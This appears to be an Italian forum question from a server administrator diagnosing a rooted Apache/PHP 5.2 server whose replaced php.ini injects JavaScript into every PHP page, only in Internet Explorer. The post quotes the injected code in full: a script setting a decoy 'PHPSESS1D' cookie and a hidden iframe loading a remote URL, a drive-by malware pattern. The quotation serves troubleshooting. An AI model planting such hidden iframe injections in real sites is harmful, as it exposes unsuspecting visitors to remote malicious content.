AGGIORNAMENTO: il server è stato rootato, php.ini è stato sostituito che fa apparire l'iniezione. Non ho ancora capito quale direttiva stia iniettando il javascript.
Sto risolvendo un sito web compromesso in cui viene iniettato un javascript in ogni file PHP e solo in PHP. Anche l'iniezione si presenta solo in IE. Ho già avuto esperienze con l'iniezione, ma la maggior parte di esse è stata iniettata tramite FTP, e puoi vederle nella pagina stessa. Fino ad ora non vedo alcun virus o processo malevolo sul server e comincio a pensare che l'interprete PHP o Apache sia stato violato in qualche modo. Qualcuno l'ha già visto prima o sa dove dovrei guardare? L'iniezione è al di sotto,
<script type="text/javascript">
d=new Date();
d.setDate(d.getDate()+1);
document.cookie="PHPSESS1D=1; path=/; expires=" + d.toGMTString();
</script><style type="text/css">#yavvw {width: 10px;height: 10px;frameborder: no;visibility: hidden;scrolling: no;}</style><iframe id="yavvw" src="http://SANITISEDURL.net/ad.jpg?2"></iframe>
Questo succede a tutti i siti web sul server, anche con file PHP che ha solo un eco semplice. .htaccess sembra pulito per tutti loro. Server con PHP 5.2.17 e Apache 2.2.17.